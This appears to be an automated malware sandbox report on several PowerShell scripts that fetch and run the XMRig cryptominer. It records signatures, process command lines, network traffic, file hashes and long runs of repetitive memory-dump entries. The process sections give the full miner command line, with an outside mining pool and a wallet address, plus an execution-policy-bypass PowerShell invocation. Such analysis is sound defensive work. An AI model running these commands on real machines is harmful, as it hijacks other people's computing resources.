memory/3532-90-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-91-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-92-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-93-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-94-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-95-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-96-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-97-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-98-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-99-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-100-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-101-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-102-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-103-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-104-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-105-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-106-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-107-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-108-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-109-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-110-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-111-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-112-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-113-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-114-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-115-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-116-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-117-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-118-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:33

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1744s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp

Files

memory/5072-0-0x00007FFE30513000-0x00007FFE30515000-memory.dmp

memory/5072-1-0x0000028978D20000-0x0000028978D42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_friwu2wc.brw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5072-11-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/5072-12-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/5072-14-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/5072-15-0x0000028979A00000-0x0000028979A12000-memory.dmp

memory/5072-16-0x0000028978D10000-0x0000028978D1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4396-47-0x000001FC537E0000-0x000001FC53800000-memory.dmp

memory/4396-48-0x000001FC550E0000-0x000001FC55100000-memory.dmp

memory/4396-49-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/5072-50-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/4396-52-0x000001FC55100000-0x000001FC55120000-memory.dmp

memory/5072-51-0x00007FFE30513000-0x00007FFE30515000-memory.dmp

memory/4396-53-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-55-0x000001FC55120000-0x000001FC55140000-memory.dmp

memory/5072-54-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/5072-56-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/4396-57-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-59-0x000001FC55100000-0x000001FC55120000-memory.dmp

memory/4396-58-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-60-0x000001FC55120000-0x000001FC55140000-memory.dmp

memory/4396-61-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-62-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-63-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-64-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-65-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-66-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-67-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-68-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-69-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-70-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-71-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-72-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-73-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-74-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-75-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-76-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-77-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-78-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-79-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-80-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-81-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-82-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-83-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-84-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-85-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-86-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-87-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-88-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-89-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-90-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-91-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-92-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-93-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-94-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-95-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-96-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-97-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-98-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-99-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-100-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-101-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-102-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-103-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-104-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-105-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-106-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-107-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-108-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-109-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-110-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-111-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-112-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-113-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-114-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-115-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-116-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-117-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-118-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-119-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:49

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1791s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

memory/2692-0-0x00007FFBF81B3000-0x00007FFBF81B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mi0j4lp2.zz0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2692-10-0x000001E64ADD0000-0x000001E64ADF2000-memory.dmp

memory/2692-11-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/2692-12-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/2692-14-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/2692-15-0x000001E64BB30000-0x000001E64BB42000-memory.dmp

memory/2692-16-0x000001E64ADC0000-0x000001E64ADCA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4856-47-0x000001AE6D8A0000-0x000001AE6D8C0000-memory.dmp

memory/4856-48-0x000001AE6D8E0000-0x000001AE6D900000-memory.dmp

memory/4856-49-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/2692-51-0x00007FFBF81B3000-0x00007FFBF81B5000-memory.dmp

memory/4856-50-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/2692-52-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/4856-54-0x000001AF004C0000-0x000001AF004E0000-memory.dmp

memory/4856-53-0x000001AE6D900000-0x000001AE6D920000-memory.dmp

memory/4856-55-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/2692-56-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/4856-57-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-58-0x000001AE6D900000-0x000001AE6D920000-memory.dmp

memory/4856-59-0x000001AF004C0000-0x000001AF004E0000-memory.dmp

memory/4856-60-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-61-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-62-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-63-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-64-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-65-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-66-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-67-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-68-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-69-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-70-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-71-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-72-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-73-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-74-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-75-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-76-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-77-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-78-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-79-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-80-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-81-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-82-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-83-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-84-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-85-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-86-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-87-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-88-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-89-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-90-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-91-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-92-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-93-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-94-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-95-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-96-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-97-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-98-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-99-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-100-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-101-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-102-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-103-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-104-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-105-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-106-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-107-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-108-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-109-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-110-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-111-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-112-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-113-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-114-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-115-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-116-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-117-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-118-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:58

Platform

win11-20240426-en

Max time kernel

1792s

Max time network

1777s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

